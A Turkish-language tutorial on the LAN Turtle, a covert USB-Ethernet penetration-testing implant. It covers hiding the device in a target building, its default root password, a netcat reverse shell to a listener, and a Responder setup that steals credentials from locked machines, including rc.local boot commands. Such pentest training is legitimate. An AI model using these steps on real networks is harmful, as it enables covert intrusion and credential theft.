LAN Turtle Hakkında Her Şey

LAN Turtle’ı bırak, Shell aç

LAN Turtle, gizli uzaktan erişim, ağda bilgi toplama ve MiTM izleme özelliklerine sahip bir Sistem Yönetme ve Pentest cihazıdır.

Normal görünümlü “USB Ethernet Adaptörü” kasası sayesinde, LAN Turtle çoğu IT ortamında göze batmadan saklanabilir.

Donanım

image-1

  • Atheros AR9331 SoC at 400 MHz MIPS
  • 16 MB Onboard Flash
  • 64 MB DDR2 RAM
  • 10/100 Ethernet Port
  • USB Ethernet Port - Realtek RTL8152
  • Belirtici LED (Yeşil Güç, Sarı Status)
  • Button (Kasa içinde - Fabrika Ayarları / Firmware Kurtarma)
  • Boyutlar: 95 x 23 x 31 mm

image-2

image-3

Kullanılabileceği Senaryolar:

image-4

  • Hedef şirketin ağına gizlice yerleştirilerek, Pentest ekibine Metasploit’in Meterpreter’ıyla uzaktan erişim sağlayabilir.
  • Hedef bilgisayara yerleştirilerek DNS’i zehirleyip, Pentest ekibine phishing noktaları sağlayabilir.
  • Hedef bilgisayarla LAN arasına gizlice yerleştirilerek ağ trafiğinin arasına girerek log tutabilir.
  • Host LAN’ın içinde paylaşılan veriyi alıp, dışarıdaki bir SSH dosya sistemine çıkarabilir.
  • Host LAN’a açılan bir OpenVPN Gateway’i gibi çalışarak, sistem yöneticisi veya Pentest ekibi tarafından LAN Turtle’a açık tüm cihazların uzaktan yoklanmasını sağlayabilir.
  • Hedef ağın hızlıca bir haritasını çıkararak, Pentest ekibine HTTP veya Email üzerinden rapor sağlayabilir.
  • SSH üzerinden kalıcı bir Reverse Shell sağlayabilir
  • Gerçek bir USB Ethernet adaptörüymüş gibi çalışırken, LAN Turtle’ın Linux tabanlı işletim sistemine uyumlu çalışacak şekilde cross-compile edilmiş tüm otomatik saldırı tool’larını kullanarak host ağ veya bilgisayara saldırabilir.

Güç Sağlanması:

LAN Turtle USB ile güçlendirilir ve 200mA civarında 5V’luk güce ihtiyacı vardır. Ortalama güç kullanımı 1 Watt’tır.

  • Hedef binadaki bir masaüstü bilgisayarın arkasındaki USB port’lardan birine gizlice yerleştirilebilir.
  • Ethernet’e bağlı bir ağ dolabında USB bataryasıyla durabilir. 15000 mHZ’lik bir güç ünitesiyle LAN Turtle yaklaşık 3 gün açık kalabilir.
  • Telefon odasında boş bir Ethernet kablosuna takılı ve normal bir smartphone USB duvar şarj aletine bağlı şekilde saklanabilir.
  • Server dolabında boş bir sunucu USB deliğine arasında USB Data Blocker ile bağlanarak, tespit edilmeden gizlenebilir.
  • Pentest ekibinin Android tabletine veya akıllı telefonuna USB OTG kabloyla bağlanarak mobil kullanılabilecek bir Andriod SSH client’ıyla kullanılabilir. Not: Bazı akıllı telefonlar ve tabletler, LAN Turtle’ı çalıştırmaya yetecek kadar güç sağlamayabilir.

SSH üzerinden Turtle Shell’i kullanabilen her OS ile uyumludur.

image-5

  • Windows’ta PuTTY

(Window > Translation’dan ISO-8859-1 Remote Character Set seçin. Yoksa Menünün dış çizgileri bozuk çıkabiliyor)

  • Linux & Mac üzerinde varolan SSH client’ları ssh root@172.16.84.1

  • Android’de OTG kablosu ve SSH client’ı (Örn. ConnectBot) kullanılabilir.

İlk Ayarlar & Güncellemeler

LAN Turtle Menüsü turtle komutu ile çağrılır.

IP, Port, Username ve Password

IP ve Port: 172.16.84.1:22
User: root
Password: sh3llz

(İlk login’inizde default parolayı değiştirmeniz istenir.)

Güncelleme

  • Config > Check for updates (internet bağlantısı gerektirir)
  • Güncellemelerin yüklenmesi ortalama 5 dk. sürecektir.
  • Güncelleme tamamlandığında LAN Turtle reboot edecek ve açık SSH session’ınız sona erecektir.
  • Güncellemenin hemen ardından, koyduğunuz parola sıfırlanacak ve cihaz tekrar default parolası olan sh3llz’e dönecektir.

Aşamalar

  • LAN Turtle’ı USB portuna ve Ethernet’e bağla, 30 saniye civarı bekle
  • SSH ile bağlan, update yap, modülleri seç ve kur
  • Konfigürasyonu hedef sisteme göre gerçekleştir
  • Yerleştir ve saldır

LAN Turtle yapısında, işin büyük kısmını modüller halleder. Kurulum için Turtle Shell üzerindeki modüller listesinden kutuların içine [x] atarak, kurmak istediğiniz modülleri seçebilirsiniz. Hepsini indirmenizde de bir sakınca yoktur. Burayı bir tür küçük LAN Turtle App Store’u gibi düşünebilirsiniz.

LAN Turtle, boot edildiği zaman Turtle Shell adı verilen kendi arayüzüne düşecektir. Bundan çıktığınızda, altındaki Linux makinesinin Ash tabanlı terminaline düşebilirsiniz. Turtle Shell’e ihtiyacınız olması durumunda, turtle komutu ile dönüş yapabilirsiniz.

UYARI: LAN Turtle’ın konfigürasyon aşamasında, tüm firmware güncellemelerini ve kullanacağı modülleri lanturtle.com adresinden indireceği için, bu tür trafik yaratacak adımları Pentest sırasında yapmak istemeyebilirsiniz. Kendi labortuvar ortamınızda ise sorun yok.

NetCat ile Basit Reverse Shell Açma

Modüllerden netcat-revshell’i indirip kurduktan sonra, Modules menüsünden, Netcat-revshell’i seçip, konfigürasyonunu yapıyoruz. Karşımıza çıkacak ekrandaki HOST/PORT bilgileri olarak, açacağınız NetCat dinleyicisinin IP ve Port değerlerini vermeniz gerekecek.

< Help > seçeneğiyle, çalıştırmakta olduğunuz modülün operasyonuyla ilgili daha detaylı bilgi alabilirsiniz.

Dinleyici makinemizde, netcat -l -v -p [Port Numarası] ile bir dinleyici açabiliriz.

Şimdi, Lan Turtle üzerinde netcat-revshell servisini başlattığımız zaman reverse shell çalışacak ve dinleyici makinemizde bağlantının açıldığına dair bir çıktı alacağız. Bu noktadan sonra LAN Turtle üzerinden hedef ağı görüntüleyebiliriz.

Dikkat: Kullanılan portun dolu olmadığından emin olunuz. Örneğimizde port 3333’ü kullandık.

Mobix ile Kilitli Makinelerden Credential Çalma

Normal kurulum ve güncellemenin hemen ardından, modüllerden RESPONDER‘ı indirin.

Şimdi RESPONDER‘ı seçip, CONFIGURE menüsünden ayarlarını yapmamız lazım. Interface ayarlarından, yalnızca credential bilgilerini çalmak istediğimiz host makinesini hedef alacak şekilde ayarlayalım. MODE olarak 9 seçtim.

RESPONDER‘ıEnable ve Start edelim. Çalıştırma sırasında, bazı dependency’lerinin eksik olduğunu belirtecek ve bunları indirmeye başlayacaktır. Yüklemenin bitmesini bekleyelim.

Tamamlandığında, Respnsder, modül listenizde yanında [x] ikonuyla belirecektir.

Şimdi, Responder’ın düzgün çalışması için gereken iki modülü kuralım:

opkg update

opkg install phython-openssl screen

bu adım atlanabilir zira modüle gelen /tmp/ adresine giden symlink’i kaldıralım ki, log’ları alabilelim:

rm -rf /overlay/etc/turtle/Responder/logs

Ayrıca /overlay/etc/rc.local dosyası da birazcık değişik:

/etc/init.d/dnsmasq stop

/usr/sbin/screen -dmS responder bash -c 'cd /overlay/etc/turtle/Responder; python Responder.py -I br-lan -f -w -r -d -F'

Özetle, sistem bir şeye ulaşmaya çalıştığında, “Evet, tabi, ben O’yum!” deyip, sonra istediği yazma/okuma operasyonlarına geçecek.

İlgili linkler: GitHub, room362

Turtle Shell’in Arkaplanı

Örnek: /etc/banner adresinde tutulan LAN Turtle banner’ını görebiliriz.

Modülleri görüntüleme: ls -la /etc/turtle/modules

Firmware Düzeltme ve İlk Konfigürasyon (Cihazın brick olması durumunda reset’lemek için)

Fabrika Ayarlarına Döndürme

  • Cihazın altındaki ufak düğmeye BASILI TUTARAK cihazı USB tarafından PC’ye bağlayın.
  • USB’ye taktıktan sonra da 3 saniye boyunca tuşa basılı tutun.
  • 30 sn. civarı bekleyin.
  • XXXXXX domain’inden LANTurtle’ın son Firmware versiyonunu indirin
  • 192.168.1.0 IP adresinden LANTurtle’ın Firmware kontrol sayfasına girin ve indirdiğiniz firmware dosyasını LANTurtle’a upload edin.
  • Kurulum bitince cihazı çıkarın, ve bu sefer düğmesine basılı tutmadan USB portuna takın.

Cihaz bu adımlardan sonra Default ayarlarıyla çalışmaya hazır olacaktır. SSH ile bağlanabilir ve “İlk Ayarlar & Güncellemeler” kısmındaki adımlarla ilerleyebilirsiniz.